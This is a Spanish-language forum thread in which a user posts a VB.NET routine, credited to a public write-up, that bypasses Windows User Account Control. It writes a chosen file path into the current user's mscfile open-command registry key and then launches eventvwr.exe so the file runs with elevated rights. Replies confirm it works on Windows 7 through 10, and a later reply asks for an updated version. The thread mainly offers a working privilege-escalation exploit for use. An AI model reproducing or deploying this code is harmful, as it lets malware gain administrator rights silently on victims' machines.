[VB.NET] Bypass UAC

fudmario · Noviembre 04, 2016, 12:59:52 AM

Código: vbnet


Public Sub Bypass_UAC(ByVal filepath As String)
            'Based: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
            Using regkey As RegistryKey = Registry.CurrentUser.CreateSubKey("Software\Classes\mscfile\shell\open\command")
                regkey.SetValue("", filepath, RegistryValueKind.String)
            End Using
            Process.Start("eventvwr.exe")
        End Sub

Update:
Change : OpenSubKey ---> CreateSubKey

79137913 · Noviembre 04, 2016, 08:54:50 AM

HOLA!!!

Esto realmente funciona? para que SOs?

GRACIAS POR LEER!!!

grep · Noviembre 04, 2016, 11:37:38 AM

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Esto realmente funciona? para que SOs?

CitarThis technique has been tested on Windows 7 and Windows 10, but is expected to work on all versions of Windows that implement UAC.

fuente:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos

fudmario · Noviembre 04, 2016, 12:06:16 PM

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
HOLA!!!

Esto realmente funciona? para que SOs?

GRACIAS POR LEER!!!

Win7, Win8, Win8.1 y Win10 (x86 - x64).
Aunque si se modifica el Control de Cuentas de Usuario se puede bloquear esto.

sadfud · Noviembre 04, 2016, 01:13:52 PM

Si, si funciona, es mas, esto se le notifico a microsoft ( como pone en el blog de enigma) y no parece que les importe demasiado.

Gracias por la implementacion

jbroken · Febrero 03, 2018, 05:15:59 PM

unfortunately this method does not work anymore

. is there any updated system?
maybe an example code would be ideal

[VB.NET] Bypass UAC

fudmario

Noviembre 04, 2016, 12:59:52 AM Ultima modificación: Noviembre 08, 2016, 02:38:33 PM por fudmario

79137913

Noviembre 04, 2016, 08:54:50 AM #1

grep

Noviembre 04, 2016, 11:37:38 AM #2

fudmario

Noviembre 04, 2016, 12:06:16 PM #3

sadfud

Noviembre 04, 2016, 01:13:52 PM #4

jbroken

Febrero 03, 2018, 05:15:59 PM #5